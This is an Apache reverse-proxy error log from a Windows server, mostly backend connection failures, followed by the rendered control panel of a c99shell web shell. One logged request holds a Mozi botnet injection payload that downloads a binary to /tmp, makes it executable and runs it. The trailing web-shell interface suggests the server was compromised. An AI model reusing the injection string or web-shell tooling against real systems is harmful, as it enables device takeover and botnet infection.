[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21352] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 190.66.251.149:63210] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21352] [client 190.66.251.149:63210] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21288] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:42554] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21288] [client 201.245.192.253:42554] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:50:16.960958 2024] [proxy:error] [pid 12004:tid 20872] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Fri Mar 15 18:50:16.960958 2024] [proxy:error] [pid 12004:tid 20872] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.16) for 60s
[Fri Mar 15 18:50:16.960958 2024] [proxy_http:error] [pid 12004:tid 20872] [client 186.102.49.239:61576] AH01114: HTTP: failed to make connection to backend: 172.22.1.16, referer: http://localhost/
[Fri Mar 15 18:50:16.960958 2024] [proxy:error] [pid 12004:tid 20968] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Fri Mar 15 18:50:16.960958 2024] [proxy_http:error] [pid 12004:tid 20968] [client 186.102.49.239:61579] AH01114: HTTP: failed to make connection to backend: 172.22.1.16, referer: http://localhost/
[Fri Mar 15 18:50:16.960958 2024] [proxy:error] [pid 12004:tid 21288] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Fri Mar 15 18:50:16.960958 2024] [proxy_http:error] [pid 12004:tid 21288] [client 186.102.49.239:61578] AH01114: HTTP: failed to make connection to backend: 172.22.1.16, referer: http://localhost/
[Fri Mar 15 18:50:16.960958 2024] [proxy:error] [pid 12004:tid 21416] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Fri Mar 15 18:50:16.960958 2024] [proxy_http:error] [pid 12004:tid 21416] [client 186.102.49.239:61577] AH01114: HTTP: failed to make connection to backend: 172.22.1.16, referer: http://localhost/
[Fri Mar 15 18:50:17.569359 2024] [proxy:error] [pid 12004:tid 20768] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Fri Mar 15 18:50:17.569359 2024] [proxy_http:error] [pid 12004:tid 20768] [client 186.102.49.239:61580] AH01114: HTTP: failed to make connection to backend: 172.22.1.16, referer: http://localhost/
[Fri Mar 15 18:51:38.143500 2024] [proxy:error] [pid 12004:tid 21416] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Fri Mar 15 18:51:38.143500 2024] [proxy:error] [pid 12004:tid 21416] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.16) for 60s
[Fri Mar 15 18:51:38.143500 2024] [proxy_http:error] [pid 12004:tid 21416] [client 201.245.192.253:59436] AH01114: HTTP: failed to make connection to backend: 172.22.1.16
[Fri Mar 15 18:52:30.528392 2024] [proxy:error] [pid 12004:tid 20968] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 18:52:31.776394 2024] [proxy:error] [pid 12004:tid 21080] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 18:52:32.587596 2024] [proxy:error] [pid 12004:tid 20968] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 18:52:33.975998 2024] [proxy:error] [pid 12004:tid 21080] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 18:52:35.536001 2024] [proxy:error] [pid 12004:tid 20968] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 18:52:36.690403 2024] [proxy:error] [pid 12004:tid 21080] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 18:52:37.720005 2024] [proxy:error] [pid 12004:tid 20968] AH00940: HTTP: disabled connection for (172.22.1.16)
[Fri Mar 15 19:33:13.493683 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 19:49:49.415032 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 19:53:26.427014 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 19:55:47.997262 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 20:17:03.518903 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 20:33:52.341474 2024] [core:error] [pid 12004:tid 21136] [client 123.8.59.252:59738] AH00126: Invalid URI in request 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
[Fri Mar 15 20:34:41.809161 2024] [proxy_http:error] [pid 12004:tid 20788] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 191.156.52.237:39774] AH01095: prefetch request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.52.237 (), referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Mar 15 21:33:03.329912 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 22:02:13.434585 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 22:14:09.523643 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 22:55:31.035602 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 23:13:01.745247 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 23:31:05.073550 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--